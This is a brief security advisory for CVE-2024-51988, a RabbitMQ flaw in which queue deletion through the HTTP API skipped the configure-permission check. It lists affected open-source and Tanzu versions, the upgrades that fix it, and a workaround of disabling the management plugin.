CVE-2024-51988

Name of the Vulnerable Software and Affected Versions RabbitMQ versions prior to 3.12.11 RabbitMQ Tanzu versions prior to 1.5.2 RabbitMQ Tanzu versions prior to 3.13.0 RabbitMQ Tanzu versions prior to 4.0.0

Description RabbitMQ is a feature-rich, multi-protocol messaging and streaming broker. In affected versions, queue deletion via the HTTP API was not verifying the configure permission of the user. Users who had valid credentials, some permissions for the target virtual host, and HTTP API access could delete queues they had no deletion permissions for. This issue has been addressed in version 3.12.11 of the open source RabbitMQ release and in versions 1.5.2, 3.13.0, and 4.0.0 of the Tanzu release.

Recommendations For RabbitMQ versions prior to 3.12.11, upgrade to version 3.12.11 or later. For RabbitMQ Tanzu versions prior to 1.5.2, upgrade to version 1.5.2 or later. For RabbitMQ Tanzu versions prior to 3.13.0, upgrade to version 3.13.0 or later. For RabbitMQ Tanzu versions prior to 4.0.0, upgrade to version 4.0.0 or later. As a temporary workaround, consider disabling the management plugin and using, for example, Prometheus and Grafana for monitoring.